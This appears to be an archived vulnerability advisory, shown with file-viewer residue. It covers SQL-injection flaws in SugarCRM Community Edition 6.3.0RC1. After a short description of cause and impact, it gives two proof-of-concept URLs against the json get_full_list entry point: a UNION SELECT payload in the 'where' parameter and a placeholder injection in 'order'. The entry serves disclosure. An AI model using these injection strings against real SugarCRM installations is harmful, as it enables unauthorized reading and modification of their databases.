11 lines
No EOL
939 B
Text
Executable file
11 lines
No EOL
939 B
Text
Executable file
source: http://www.securityfocus.com/bid/50870/info
|
|
|
|
SugarCRM Community Edition is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
|
|
|
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
|
|
|
SugarCRM Community Edition 6.3.0RC1 is vulnerable; other versions may also be affected.
|
|
|
|
http://www.example.com/index.php?entryPoint=json&action=get_full_list&module=Leads&where=0%29%20union%20select%20version%28%29,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71%20--%20
|
|
|
|
http://www.example.com/index.php?entryPoint=json&action=get_full_list&module=Leads&order=SQL_CODE_HERE%20--%20 |